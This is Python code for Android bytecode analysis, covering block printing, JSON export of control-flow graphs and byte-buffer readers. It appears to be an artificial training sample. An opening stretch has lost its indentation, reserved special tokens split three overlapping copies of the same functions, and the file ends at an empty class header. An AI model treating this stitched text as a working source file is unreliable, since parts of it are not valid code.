if DVMBasicMethodBlockInstruction.get_op_value(
) == 43 or DVMBasicMethodBlockInstruction.get_op_value() == 44:
values = DVMBasicMethodBlock.get_special_ins(ins_idx)
cblock['info_next'] = values.get_values()
ins_idx += DVMBasicMethodBlockInstruction.get_length()
last_instru = DVMBasicMethodBlockInstruction
cblock['info_bb'] = 0
if DVMBasicMethodBlock.childs:
if len(DVMBasicMethodBlock.childs) > 1:
cblock['info_bb'] = 1
if last_instru.get_op_value() == 43 or last_instru.get_op_value(
) == 44:
cblock['info_bb'] = 2
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
ok = False
if DVMBasicMethodBlock.get_name() in hooks:
if DVMBasicMethodBlockChild[-1] in hooks[DVMBasicMethodBlock
.get_name()]:
ok = True
cblock['Edge'].append(hooks[DVMBasicMethodBlock.
get_name()][0].get_name())
if not ok:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
if exception_analysis:
cblock['Exceptions'] = exception_analysis.get()
reports.append(cblock)
reports.extend(l)
return json.dumps(d)
class SV(object):
def __init__(self, size, buff):
self.__size = size
self.__value = unpack(self.__size, buff)[0]
def _get(self):
return pack(self.__size, self.__value)
def __str__(self):
return '0x%x' % self.__value
def __int__(self):
return self.__value
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = attr
class SVs(object):
def __init__(self, size, ntuple, buff):
self.__size = size
self.__value = ntuple._make(unpack(self.__size, buff))
def _get(self):
l = []
for i in self.__value._fields:
l.append(getattr(self.__value, i))
return pack(self.__size, *l)
def _export(self):
return [x for x in self.__value._fields]
def get_value_buff(self):
return self._get()
def get_value(self):
return self.__value
def set_value(self, attr):
self.__value = self.__value._replace(**attr)
def __str__(self):
return self.__value.__str__()
<|reserved_special_token_0|>
class MethodBC(object):
def show(self, value):
getattr(self, 'show_' + value)()
class BuffHandle(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def size(self):
return len(self.__buff)
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def readNullString(self, size):
data = self.read(size)
return data
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def read_at(self, offset, size):
return self.__buff[offset:offset + size]
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def end(self):
return self.__idx == len(self.__buff)
class Buff(object):
def __init__(self, offset, buff):
self.offset = offset
self.buff = buff
self.size = len(buff)
class _Bytecode(object):
def __init__(self, buff):
self.__buff = bytearray(buff)
self.__idx = 0
def read(self, size):
if isinstance(size, SV):
size = size.value
buff = self.__buff[self.__idx:self.__idx + size]
self.__idx += size
return buff
def readat(self, off):
if isinstance(off, SV):
off = off.value
return self.__buff[off:]
def read_b(self, size):
return self.__buff[self.__idx:self.__idx + size]
def set_idx(self, idx):
self.__idx = idx
def get_idx(self):
return self.__idx
def add_idx(self, idx):
self.__idx += idx
def register(self, type_register, fct):
self.__registers[type_register].append(fct)
def get_buff(self):
return self.__buff
def length_buff(self):
return len(self.__buff)
def set_buff(self, buff):
self.__buff = buff
def save(self, filename):
buff = self._save()
with open(filename, 'wb') as fd:
fd.write(buff)
def FormatClassToJava(input):
"""
Transoform a typical xml format class into java format
:param input: the input class name
:rtype: string
"""
return 'L' + input.replace('.', '/') + ';'
def FormatClassToPython(input):
i = input[:-1]
i = i.replace('/', '_')
i = i.replace('$', '_')
return i
def FormatNameToPython(input):
i = input.replace('<', '')
i = i.replace('>', '')
i = i.replace('$', '_')
return i
def FormatDescriptorToPython(input):
i = input.replace('/', '_')
i = i.replace(';', '')
i = i.replace('[', '')
i = i.replace('(', '')
i = i.replace(')', '')
i = i.replace(' ', '')
i = i.replace('$', '')
return i
class Node(object):
def __init__(self, n, s):
self.id = n
self.title = s
self.children = []
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def disable_print_colors():
colors = save_colors()
remove_colors()
return colors
def enable_print_colors(colors):
enable_colors(colors)
<|reserved_special_token_0|>
def Warning(msg):
warning(msg)
def _PrintBanner():
print_fct = CONF['PRINT_FCT']
print_fct('*' * 75 + '\n')
def _PrintSubBanner(title=None):
print_fct = CONF['PRINT_FCT']
if title == None:
print_fct('#' * 20 + '\n')
else:
print_fct('#' * 10 + ' ' + title + '\n')
def _PrintNote(note, tab=0):
print_fct = CONF['PRINT_FCT']
note_color = CONF['COLORS']['NOTE']
normal_color = CONF['COLORS']['NORMAL']
print_fct('\t' * tab + '%s# %s%s' % (note_color, note, normal_color) + '\n'
)
<|reserved_special_token_0|>
def _PrintXRef(tag, items):
print_fct = CONF['PRINT_FCT']
for i in items:
print_fct('%s: %s %s %s %s\n' % (tag, i[0].get_class_name(), i[0].
get_name(), i[0].get_descriptor(), ' '.join('%x' % j.get_idx() for
j in i[1])))
<|reserved_special_token_0|>
def _PrintDefault(msg):
print_fct = CONF['PRINT_FCT']
print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
idx = 0
nb = 0
offset_color = CONF['COLORS']['OFFSET']
offset_addr_color = CONF['COLORS']['OFFSET_ADDR']
instruction_name_color = CONF['COLORS']['INSTRUCTION_NAME']
branch_false_color = CONF['COLORS']['BRANCH_FALSE']
branch_true_color = CONF['COLORS']['BRANCH_TRUE']
branch_color = CONF['COLORS']['BRANCH']
exception_color = CONF['COLORS']['EXCEPTION']
bb_color = CONF['COLORS']['BB']
normal_color = CONF['COLORS']['NORMAL']
print_fct = CONF['PRINT_FCT']
colors = CONF['COLORS']['OUTPUT']
for i in basic_blocks:
print_fct('%s%s%s : \n' % (bb_color, i.get_name(), normal_color))
instructions = i.get_instructions()
for ins in instructions:
if nb in notes:
for note in notes[nb]:
_PrintNote(note, 1)
print_fct('\t%s%-3d%s(%s%08x%s) ' % (offset_color, nb,
normal_color, offset_addr_color, idx, normal_color))
print_fct('%s%-20s%s' % (instruction_name_color, ins.get_name(),
normal_color))
operands = ins.get_operands()
print_fct('%s' % ', '.join(m_a.get_vm().colorize_operands(
operands, colors)))
op_value = ins.get_op_value()
if ins == instructions[-1] and i.childs:
print_fct(' ')
if (op_value == 43 or op_value == 44) and len(i.childs) > 1:
values = i.get_special_ins(idx).get_values()
print_fct('%s[ D:%s%s ' % (branch_false_color, i.childs
[0][2].get_name(), branch_color))
print_fct(' '.join('%d:%s' % (values[j], i.childs[j + 1
][2].get_name()) for j in range(0, len(i.childs) -
1)) + ' ]%s' % normal_color)
elif len(i.childs) == 2:
print_fct('%s[ %s%s ' % (branch_false_color, i.childs[0
][2].get_name(), branch_true_color))
print_fct(' '.join('%s' % c[2].get_name() for c in i.
childs[1:]) + ' ]%s' % normal_color)
else:
print_fct('%s[ ' % branch_color + ' '.join('%s' % c[2].
get_name() for c in i.childs) + ' ]%s' % normal_color)
idx += ins.get_length()
nb += 1
print_fct('\n')
if i.get_exception_analysis():
print_fct('\t%s%s%s\n' % (exception_color, i.exception_analysis
.show_buff(), normal_color))
print_fct('\n')
class TmpBlock(object):
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def method2json(mx, directed_graph=False):
if directed_graph:
return method2json_direct(mx)
return method2json_undirect(mx)
def method2json_undirect(mx):
d = {}
reports = []
d['reports'] = reports
for DVMBasicMethodBlock in mx.basic_blocks.gets():
cblock = {}
cblock['BasicBlockId'] = DVMBasicMethodBlock.get_name()
cblock['registers'] = mx.get_method().get_code().get_registers_size()
cblock['instructions'] = []
ins_idx = DVMBasicMethodBlock.start
for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
):
c_ins = {}
c_ins['idx'] = ins_idx
c_ins['name'] = DVMBasicMethodBlockInstruction.get_name()
c_ins['operands'] = DVMBasicMethodBlockInstruction.get_operands(
ins_idx)
cblock['instructions'].append(c_ins)
ins_idx += DVMBasicMethodBlockInstruction.get_length()
cblock['Edge'] = []
for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
cblock['Edge'].append(DVMBasicMethodBlockChild[-1].get_name())
reports.append(cblock)
return json.dumps(d)
def method2json_direct(mx):
    """Render *mx* as JSON for a directed graph.

    A self-looping block B gets an artificial empty 'B-pre' block: each
    parent of B is re-pointed at 'B-pre', whose single edge leads back to B,
    so the rendered graph contains no direct self edge.
    """
    reports = []
    hooks = {}          # parent block name -> [preblock, redirected child, ...]
    extra_blocks = []   # synthetic '-pre' blocks, appended after the real ones
    for bb in mx.basic_blocks.gets():
        for child in bb.childs:
            # A block listed among its own children is a self loop.
            if bb.get_name() != child[-1].get_name():
                continue
            preblock = TmpBlock(bb.get_name() + '-pre')
            extra_blocks.append({
                'BasicBlockId': bb.get_name() + '-pre',
                'start': bb.start,
                'notes': [],
                'Edge': [bb.get_name()],
                'registers': 0,
                'instructions': [],
                'info_bb': 0,
            })
            for parent in bb.fathers:
                redirected = [preblock]
                for pchild in parent[-1].childs:
                    if pchild[-1].get_name() == bb.get_name():
                        redirected.append(pchild[-1])
                hooks[parent[-1].get_name()] = redirected
    for bb in mx.basic_blocks.gets():
        cblock = {
            'BasicBlockId': bb.get_name(),
            'start': bb.start,
            'notes': bb.get_notes(),
            'registers': mx.get_method().get_code().get_registers_size(),
            'instructions': [],
        }
        ins_idx = bb.start
        last_ins = None
        for ins in bb.get_instructions():
            cblock['instructions'].append({
                'idx': ins_idx,
                'name': ins.get_name(),
                'operands': ins.get_operands(ins_idx),
                'formatted_operands': ins.get_formatted_operands(),
            })
            # 0x2b/0x2c (packed/sparse switch): record the jump table values.
            if ins.get_op_value() in (0x2b, 0x2c):
                cblock['info_next'] = bb.get_special_ins(ins_idx).get_values()
            ins_idx += ins.get_length()
            last_ins = ins
        # info_bb: 0 = plain block, 1 = multi-way branch, 2 = switch.
        cblock['info_bb'] = 0
        if bb.childs:
            if len(bb.childs) > 1:
                cblock['info_bb'] = 1
            if last_ins.get_op_value() in (0x2b, 0x2c):
                cblock['info_bb'] = 2
        cblock['Edge'] = []
        redirected = hooks.get(bb.get_name())
        for child in bb.childs:
            if redirected is not None and child[-1] in redirected:
                # Route the self edge through the synthetic '-pre' block.
                cblock['Edge'].append(redirected[0].get_name())
            else:
                cblock['Edge'].append(child[-1].get_name())
        exception_analysis = bb.get_exception_analysis()
        if exception_analysis:
            cblock['Exceptions'] = exception_analysis.get()
        reports.append(cblock)
    reports.extend(extra_blocks)
    return json.dumps({'reports': reports})
class SV(object):
    """A single scalar decoded from bytes with a struct format string."""

    def __init__(self, size, buff):
        self.__fmt = size
        self.__val = unpack(self.__fmt, buff)[0]

    def _get(self):
        # Re-encode the current value with the original format.
        return pack(self.__fmt, self.__val)

    def __str__(self):
        return '0x%x' % self.__val

    def __int__(self):
        return self.__val

    def get_value_buff(self):
        return self._get()

    def get_value(self):
        return self.__val

    def set_value(self, attr):
        self.__val = attr
class SVs(object):
    """A namedtuple of scalars decoded from bytes with one struct format."""

    def __init__(self, size, ntuple, buff):
        self.__fmt = size
        self.__val = ntuple._make(unpack(self.__fmt, buff))

    def _get(self):
        fields = [getattr(self.__val, name) for name in self.__val._fields]
        return pack(self.__fmt, *fields)

    def _export(self):
        return list(self.__val._fields)

    def get_value_buff(self):
        return self._get()

    def get_value(self):
        return self.__val

    def set_value(self, attr):
        self.__val = self.__val._replace(**attr)

    def __str__(self):
        return self.__val.__str__()
def object_to_bytes(obj):
    """
    Convert a object to a bytearray or call get_raw() of the object
    if no useful type was found.
    """
    # BUG FIX: the None test used `==` and ran *after* the isinstance checks;
    # an object with a permissive __eq__ could be misclassified as None.
    # Test identity first.
    if obj is None:
        return bytearray()
    if isinstance(obj, str):
        return bytearray(obj, 'UTF-8')
    if isinstance(obj, bool):
        # bool must precede int (bool is an int subclass) and adds no bytes
        return bytearray()
    if isinstance(obj, int):
        return pack('<L', obj)
    if isinstance(obj, bytearray):
        return obj
    return obj.get_raw()
class MethodBC(object):
    """Base providing show(value), which dispatches to self.show_<value>()."""

    def show(self, value):
        handler = getattr(self, 'show_' + value)
        handler()
class BuffHandle(object):
    """Read cursor over an immutable byte buffer."""

    def __init__(self, buff):
        self.__buff = bytearray(buff)
        self.__idx = 0

    def size(self):
        return len(self.__buff)

    def set_idx(self, idx):
        self.__idx = idx

    def get_idx(self):
        return self.__idx

    def readNullString(self, size):
        data = self.read(size)
        return data

    def read_b(self, size):
        # Peek *size* bytes without advancing the cursor.
        return self.__buff[self.__idx:self.__idx + size]

    def read_at(self, offset, size):
        return self.__buff[offset:offset + size]

    def read(self, size):
        if isinstance(size, SV):
            # BUG FIX: SV has no public `.value` attribute (its field is
            # name-mangled), so `size.value` raised AttributeError; use the
            # accessor instead.
            size = size.get_value()
        buff = self.__buff[self.__idx:self.__idx + size]
        self.__idx += size
        return buff

    def end(self):
        return self.__idx == len(self.__buff)
class Buff(object):
    """A chunk of raw data plus the offset it was taken from."""

    def __init__(self, offset, buff):
        # size caches len(buff) at construction time
        self.offset = offset
        self.buff = buff
        self.size = len(buff)
class _Bytecode(object):
    """Mutable byte buffer with a read cursor; base for raw format parsers."""

    def __init__(self, buff):
        self.__buff = bytearray(buff)
        self.__idx = 0
        # BUG FIX: register() appended into self.__registers, which was never
        # created anywhere, so every call raised AttributeError.
        self.__registers = {}

    def read(self, size):
        if isinstance(size, SV):
            # BUG FIX: SV exposes no public `.value`; use the accessor.
            size = size.get_value()
        buff = self.__buff[self.__idx:self.__idx + size]
        self.__idx += size
        return buff

    def readat(self, off):
        if isinstance(off, SV):
            off = off.get_value()
        return self.__buff[off:]

    def read_b(self, size):
        # Peek without advancing the cursor.
        return self.__buff[self.__idx:self.__idx + size]

    def set_idx(self, idx):
        self.__idx = idx

    def get_idx(self):
        return self.__idx

    def add_idx(self, idx):
        self.__idx += idx

    def register(self, type_register, fct):
        self.__registers.setdefault(type_register, []).append(fct)

    def get_buff(self):
        return self.__buff

    def length_buff(self):
        return len(self.__buff)

    def set_buff(self, buff):
        self.__buff = buff

    def save(self, filename):
        buff = self._save()
        with open(filename, 'wb') as fd:
            fd.write(buff)
def FormatClassToJava(input):
    """
    Transoform a typical xml format class into java format

    :param input: the input class name

    :rtype: string
    """
    return 'L%s;' % input.replace('.', '/')
def FormatClassToPython(input):
    """Map a class descriptor like 'La/b/C$D;' to an identifier 'La_b_C_D'."""
    return input[:-1].replace('/', '_').replace('$', '_')
def FormatNameToPython(input):
    """Strip angle brackets and map '$' so a member name becomes an identifier."""
    return input.replace('<', '').replace('>', '').replace('$', '_')
def FormatDescriptorToPython(input):
    """Sanitize a type descriptor into an identifier-friendly token."""
    # '/' becomes '_'; the structural characters ';[() $' are dropped.
    table = str.maketrans({'/': '_', ';': None, '[': None, '(': None,
                           ')': None, ' ': None, '$': None})
    return input.translate(table)
class Node(object):
    """A display-graph node: numeric id, title string, and child list."""

    def __init__(self, n, s):
        self.id = n
        self.title = s
        self.children = []  # child Nodes; starts empty
<|reserved_special_token_1|>
from __future__ import print_function
from __future__ import absolute_import
from builtins import str
from builtins import range
from builtins import object
import hashlib
from xml.sax.saxutils import escape
from struct import unpack, pack
import textwrap
import json
from .anconf import warning, error, CONF, enable_colors, remove_colors, save_colors, color_range
def disable_print_colors():
    """Switch colored output off; return the saved palette for later restore."""
    previous = save_colors()
    remove_colors()
    return previous
def enable_print_colors(colors):
    # Restore a palette previously returned by disable_print_colors().
    enable_colors(colors)
# Handle exit message
def Exit(msg):
    """Log *msg* as an error and abort by raising an exception.

    BUG FIX: the original did ``raise ("oops")``, which raises a TypeError in
    Python 3 (only BaseException subclasses can be raised) and loses *msg*.
    """
    warning("Error : " + msg)
    raise Exception("Error : " + msg)
def Warning(msg):
    # Forward *msg* to the shared warning logger from anconf.
    warning(msg)
def _PrintBanner():
    # Print a 75-character '*' separator through the configured output function.
    print_fct = CONF["PRINT_FCT"]
    print_fct("*" * 75 + "\n")
def _PrintSubBanner(title=None):
    """Print a sub-section banner, optionally labelled with *title*."""
    print_fct = CONF["PRINT_FCT"]
    # FIX: compare with None by identity, not equality.
    if title is None:
        print_fct("#" * 20 + "\n")
    else:
        print_fct("#" * 10 + " " + title + "\n")
def _PrintNote(note, tab=0):
    """Emit *note* as a colorized '#' comment, indented *tab* tab stops."""
    colors = CONF["COLORS"]
    line = "\t" * tab + "%s# %s%s" % (colors["NOTE"], note, colors["NORMAL"]) + "\n"
    CONF["PRINT_FCT"](line)
# Print arg into a correct format
def _Print(name, arg):
    """Print *name* followed by a type-appropriate rendering of *arg*.

    Plain ints render as hex, strings verbatim, SV/SVs through their
    accessors; any other type prints just the name.
    """
    buff = name + " "
    # exact type() checks (not isinstance) deliberately exclude bool and
    # other subclasses, matching the historical type-name string comparison;
    # the former separate Python 2 'long' branch is dead in Python 3.
    if type(arg) is int:
        buff += "0x%x" % arg
    elif type(arg) is str:
        buff += "%s" % arg
    elif isinstance(arg, SV):
        buff += "0x%x" % arg.get_value()
    elif isinstance(arg, SVs):
        buff += arg.get_value().__str__()
    print(buff)
def PrettyShowEx(exceptions):
    """Print the exception records, colorized, if any exist."""
    if not exceptions:
        return
    print_fct = CONF["PRINT_FCT"]
    exc_color = CONF["COLORS"]["EXCEPTION"]
    normal = CONF["COLORS"]["NORMAL"]
    print_fct("Exceptions:\n")
    for exc in exceptions:
        print_fct("\t%s%s%s\n" % (exc_color, exc.show_buff(), normal))
def _PrintXRef(tag, items):
    """Print one line per xref item: tag, method identity, and hex indices."""
    print_fct = CONF["PRINT_FCT"]
    for item in items:
        ref = item[0]
        indices = ' '.join("%x" % xref.get_idx() for xref in item[1])
        print_fct("%s: %s %s %s %s\n" % (tag, ref.get_class_name(),
                                         ref.get_name(), ref.get_descriptor(),
                                         indices))
def _PrintDRef(tag, items):
    """Like _PrintXRef, but the second element already holds raw integers."""
    print_fct = CONF["PRINT_FCT"]
    for item in items:
        ref = item[0]
        indices = ' '.join("%x" % off for off in item[1])
        print_fct("%s: %s %s %s %s\n" % (tag, ref.get_class_name(),
                                         ref.get_name(), ref.get_descriptor(),
                                         indices))
def _PrintDefault(msg):
    # Print *msg* verbatim through the configured output function.
    print_fct = CONF["PRINT_FCT"]
    print_fct(msg)
def PrettyShow(m_a, basic_blocks, notes={}):
    """Pretty-print the disassembly of *basic_blocks* with colors.

    :param m_a: the method analysis owning the blocks (used to colorize operands)
    :param basic_blocks: iterable of basic blocks to render
    :param notes: optional mapping of instruction counter -> list of note strings
    """
    # NOTE(review): the mutable default {} is shared across calls but is only
    # ever read here, so it is harmless.
    idx = 0
    nb = 0
    offset_color = CONF["COLORS"]["OFFSET"]
    offset_addr_color = CONF["COLORS"]["OFFSET_ADDR"]
    instruction_name_color = CONF["COLORS"]["INSTRUCTION_NAME"]
    branch_false_color = CONF["COLORS"]["BRANCH_FALSE"]
    branch_true_color = CONF["COLORS"]["BRANCH_TRUE"]
    branch_color = CONF["COLORS"]["BRANCH"]
    exception_color = CONF["COLORS"]["EXCEPTION"]
    bb_color = CONF["COLORS"]["BB"]
    normal_color = CONF["COLORS"]["NORMAL"]
    print_fct = CONF["PRINT_FCT"]
    colors = CONF["COLORS"]["OUTPUT"]
    for i in basic_blocks:
        print_fct("%s%s%s : \n" % (bb_color, i.get_name(), normal_color))
        instructions = i.get_instructions()
        for ins in instructions:
            # Notes attached to this instruction counter are printed first.
            if nb in notes:
                for note in notes[nb]:
                    _PrintNote(note, 1)
            # Instruction counter and byte offset.
            print_fct("\t%s%-3d%s(%s%08x%s) " %
                      (offset_color, nb, normal_color, offset_addr_color, idx,
                       normal_color))
            print_fct("%s%-20s%s" %
                      (instruction_name_color, ins.get_name(), normal_color))
            operands = ins.get_operands()
            print_fct(
                "%s" %
                ", ".join(m_a.get_vm().colorize_operands(operands, colors)))
            op_value = ins.get_op_value()
            # On the block's last instruction, print the outgoing edges.
            if ins == instructions[-1] and i.childs:
                print_fct(" ")
                # packed/sparse-switch
                if (op_value == 0x2b or op_value == 0x2c) and len(i.childs) > 1:
                    values = i.get_special_ins(idx).get_values()
                    print_fct("%s[ D:%s%s " %
                              (branch_false_color, i.childs[0][2].get_name(),
                               branch_color))
                    print_fct(' '.join("%d:%s" % (
                        values[j], i.childs[j + 1][2].get_name()) for j in
                        range(0, len(i.childs) - 1)) + " ]%s" %
                        normal_color)
                else:
                    if len(i.childs) == 2:
                        # two children: false target, then true target
                        print_fct("%s[ %s%s " % (branch_false_color,
                                                 i.childs[0][2].get_name(),
                                                 branch_true_color))
                        print_fct(' '.join("%s" % c[2].get_name(
                        ) for c in i.childs[1:]) + " ]%s" % normal_color)
                    else:
                        print_fct("%s[ " % branch_color + ' '.join(
                            "%s" % c[2].get_name() for c in i.childs) +
                            " ]%s" % normal_color)
            idx += ins.get_length()
            nb += 1
            print_fct("\n")
        if i.get_exception_analysis():
            print_fct("\t%s%s%s\n" %
                      (exception_color, i.exception_analysis.show_buff(),
                       normal_color))
        print_fct("\n")
class TmpBlock(object):
    """Lightweight block stand-in carrying only a name.

    method2json_direct uses it for the synthetic '-pre' blocks it inserts.
    """

    def __init__(self, name):
        self.name = name

    def get_name(self):
        return self.name
def method2json(mx, directed_graph=False):
    """Serialize *mx* to JSON, honouring the requested graph directedness."""
    return method2json_direct(mx) if directed_graph else method2json_undirect(mx)
def method2json_undirect(mx):
    """Dump every basic block of *mx* as JSON without directed-edge fixups."""
    reports = []
    for bb in mx.basic_blocks.gets():
        ins_list = []
        ins_idx = bb.start
        for ins in bb.get_instructions():
            ins_list.append({
                "idx": ins_idx,
                "name": ins.get_name(),
                "operands": ins.get_operands(ins_idx),
            })
            ins_idx += ins.get_length()
        reports.append({
            "BasicBlockId": bb.get_name(),
            "registers": mx.get_method().get_code().get_registers_size(),
            "instructions": ins_list,
            "Edge": [c[-1].get_name() for c in bb.childs],
        })
    return json.dumps({"reports": reports})
def method2json_direct(mx):
    """Dump *mx* basic blocks as JSON for a directed graph.

    A self-looping block B gets an artificial empty "B-pre" block: every
    parent of B is re-pointed at "B-pre", which has a single edge back to B,
    so the rendered graph never contains a direct self edge.
    """
    d = {}
    reports = []
    d["reports"] = reports
    # hooks: parent block name -> [preblock, redirected child, ...]
    hooks = {}
    # l collects the synthetic "-pre" blocks, appended after the real ones.
    l = []
    for DVMBasicMethodBlock in mx.basic_blocks.gets():
        for index, DVMBasicMethodBlockChild in enumerate(
                DVMBasicMethodBlock.childs):
            # A block listed among its own children is a self loop.
            if DVMBasicMethodBlock.get_name(
            ) == DVMBasicMethodBlockChild[-1].get_name():
                preblock = TmpBlock(DVMBasicMethodBlock.get_name() + "-pre")
                cnblock = {}
                cnblock["BasicBlockId"] = DVMBasicMethodBlock.get_name(
                ) + "-pre"
                cnblock["start"] = DVMBasicMethodBlock.start
                cnblock["notes"] = []
                cnblock["Edge"] = [DVMBasicMethodBlock.get_name()]
                cnblock["registers"] = 0
                cnblock["instructions"] = []
                cnblock["info_bb"] = 0
                l.append(cnblock)
                for parent in DVMBasicMethodBlock.fathers:
                    hooks[parent[-1].get_name()] = []
                    hooks[parent[-1].get_name()].append(preblock)
                    for idx, child in enumerate(parent[-1].childs):
                        if child[-1].get_name(
                        ) == DVMBasicMethodBlock.get_name():
                            hooks[parent[-1].get_name()].append(child[-1])
    for DVMBasicMethodBlock in mx.basic_blocks.gets():
        cblock = {}
        cblock["BasicBlockId"] = DVMBasicMethodBlock.get_name()
        cblock["start"] = DVMBasicMethodBlock.start
        cblock["notes"] = DVMBasicMethodBlock.get_notes()
        cblock["registers"] = mx.get_method().get_code().get_registers_size()
        cblock["instructions"] = []
        ins_idx = DVMBasicMethodBlock.start
        last_instru = None
        for DVMBasicMethodBlockInstruction in DVMBasicMethodBlock.get_instructions(
        ):
            c_ins = {}
            c_ins["idx"] = ins_idx
            c_ins["name"] = DVMBasicMethodBlockInstruction.get_name()
            c_ins["operands"] = DVMBasicMethodBlockInstruction.get_operands(
                ins_idx)
            c_ins["formatted_operands"
                  ] = DVMBasicMethodBlockInstruction.get_formatted_operands()
            cblock["instructions"].append(c_ins)
            # packed-switch (0x2b) / sparse-switch (0x2c): record jump table.
            if (DVMBasicMethodBlockInstruction.get_op_value() == 0x2b or
                    DVMBasicMethodBlockInstruction.get_op_value() == 0x2c):
                values = DVMBasicMethodBlock.get_special_ins(ins_idx)
                cblock["info_next"] = values.get_values()
            ins_idx += DVMBasicMethodBlockInstruction.get_length()
            last_instru = DVMBasicMethodBlockInstruction
        # info_bb: 0 = plain block, 1 = multi-way branch, 2 = switch.
        cblock["info_bb"] = 0
        if DVMBasicMethodBlock.childs:
            if len(DVMBasicMethodBlock.childs) > 1:
                cblock["info_bb"] = 1
            if (last_instru.get_op_value() == 0x2b or
                    last_instru.get_op_value() == 0x2c):
                cblock["info_bb"] = 2
        cblock["Edge"] = []
        for DVMBasicMethodBlockChild in DVMBasicMethodBlock.childs:
            ok = False
            if DVMBasicMethodBlock.get_name() in hooks:
                if DVMBasicMethodBlockChild[-1] in hooks[
                        DVMBasicMethodBlock.get_name()
                ]:
                    ok = True
                    # Route the self edge through the "-pre" block instead.
                    cblock["Edge"].append(hooks[DVMBasicMethodBlock.get_name(
                    )][0].get_name())
            if not ok:
                cblock["Edge"].append(DVMBasicMethodBlockChild[-1].get_name())
        exception_analysis = DVMBasicMethodBlock.get_exception_analysis()
        if exception_analysis:
            cblock["Exceptions"] = exception_analysis.get()
        reports.append(cblock)
    reports.extend(l)
    return json.dumps(d)
class SV(object):
    """One scalar value unpacked from bytes via a struct format string."""

    def __init__(self, size, buff):
        self.__fmt = size
        self.__val = unpack(self.__fmt, buff)[0]

    def _get(self):
        # Re-encode the current value using the original format.
        return pack(self.__fmt, self.__val)

    def __str__(self):
        return "0x%x" % self.__val

    def __int__(self):
        return self.__val

    def get_value_buff(self):
        return self._get()

    def get_value(self):
        return self.__val

    def set_value(self, attr):
        self.__val = attr
class SVs(object):
    """A namedtuple of values decoded from bytes with one struct format."""

    def __init__(self, size, ntuple, buff):
        self.__fmt = size
        self.__val = ntuple._make(unpack(self.__fmt, buff))

    def _get(self):
        fields = [getattr(self.__val, name) for name in self.__val._fields]
        return pack(self.__fmt, *fields)

    def _export(self):
        return list(self.__val._fields)

    def get_value_buff(self):
        return self._get()

    def get_value(self):
        return self.__val

    def set_value(self, attr):
        self.__val = self.__val._replace(**attr)

    def __str__(self):
        return self.__val.__str__()
def object_to_bytes(obj):
    """
    Convert a object to a bytearray or call get_raw() of the object
    if no useful type was found.
    """
    # BUG FIX: the None check used `==` and ran after the isinstance checks;
    # an object with a permissive __eq__ could be misclassified as None.
    if obj is None:
        return bytearray()
    if isinstance(obj, str):
        return bytearray(obj, "UTF-8")
    if isinstance(obj, bool):
        # bool must precede int (bool subclasses int) and contributes no bytes
        return bytearray()
    if isinstance(obj, int):
        return pack("<L", obj)
    if isinstance(obj, bytearray):
        return obj
    return obj.get_raw()
class MethodBC(object):
    """Base exposing show(value): dispatches to the subclass's show_<value>()."""

    def show(self, value):
        handler = getattr(self, "show_" + value)
        handler()
class BuffHandle(object):
    """Read cursor over an immutable byte buffer."""

    def __init__(self, buff):
        self.__buff = bytearray(buff)
        self.__idx = 0

    def size(self):
        return len(self.__buff)

    def set_idx(self, idx):
        self.__idx = idx

    def get_idx(self):
        return self.__idx

    def readNullString(self, size):
        data = self.read(size)
        return data

    def read_b(self, size):
        # Peek *size* bytes without advancing the cursor.
        return self.__buff[self.__idx:self.__idx + size]

    def read_at(self, offset, size):
        return self.__buff[offset:offset + size]

    def read(self, size):
        if isinstance(size, SV):
            # BUG FIX: SV has no public `.value` attribute (it is
            # name-mangled), so `size.value` raised AttributeError; use the
            # accessor instead.
            size = size.get_value()
        buff = self.__buff[self.__idx:self.__idx + size]
        self.__idx += size
        return buff

    def end(self):
        return self.__idx == len(self.__buff)
class Buff(object):
    """A raw data chunk plus the offset it was read from."""

    def __init__(self, offset, buff):
        # size caches len(buff) at construction time
        self.offset = offset
        self.buff = buff
        self.size = len(buff)
class _Bytecode(object):
    """Mutable byte buffer with a read cursor; base for raw format parsers."""

    def __init__(self, buff):
        self.__buff = bytearray(buff)
        self.__idx = 0
        # BUG FIX: register() appended into self.__registers, which was never
        # created anywhere, so every call raised AttributeError.
        self.__registers = {}

    def read(self, size):
        if isinstance(size, SV):
            # BUG FIX: SV exposes no public `.value`; use the accessor.
            size = size.get_value()
        buff = self.__buff[self.__idx:self.__idx + size]
        self.__idx += size
        return buff

    def readat(self, off):
        if isinstance(off, SV):
            off = off.get_value()
        return self.__buff[off:]

    def read_b(self, size):
        # Peek without advancing the cursor.
        return self.__buff[self.__idx:self.__idx + size]

    def set_idx(self, idx):
        self.__idx = idx

    def get_idx(self):
        return self.__idx

    def add_idx(self, idx):
        self.__idx += idx

    def register(self, type_register, fct):
        self.__registers.setdefault(type_register, []).append(fct)

    def get_buff(self):
        return self.__buff

    def length_buff(self):
        return len(self.__buff)

    def set_buff(self, buff):
        self.__buff = buff

    def save(self, filename):
        buff = self._save()
        with open(filename, "wb") as fd:
            fd.write(buff)
def FormatClassToJava(input):
    """
    Transoform a typical xml format class into java format

    :param input: the input class name

    :rtype: string
    """
    return "L{};".format(input.replace(".", "/"))
def FormatClassToPython(input):
    """Map a class descriptor like 'La/b/C$D;' to an identifier 'La_b_C_D'."""
    body = input[:-1]
    for ch in "/$":
        body = body.replace(ch, "_")
    return body
def FormatNameToPython(input):
    """Make a member name such as '<init>' usable as a Python identifier."""
    cleaned = input.replace("<", "").replace(">", "")
    return cleaned.replace("$", "_")
def FormatDescriptorToPython(input):
    """Sanitize a type descriptor into an identifier-friendly token."""
    out = input.replace("/", "_")
    # drop the structural characters ';', '[', '(', ')', space, and '$'
    for ch in ";[() $":
        out = out.replace(ch, "")
    return out
class Node(object):
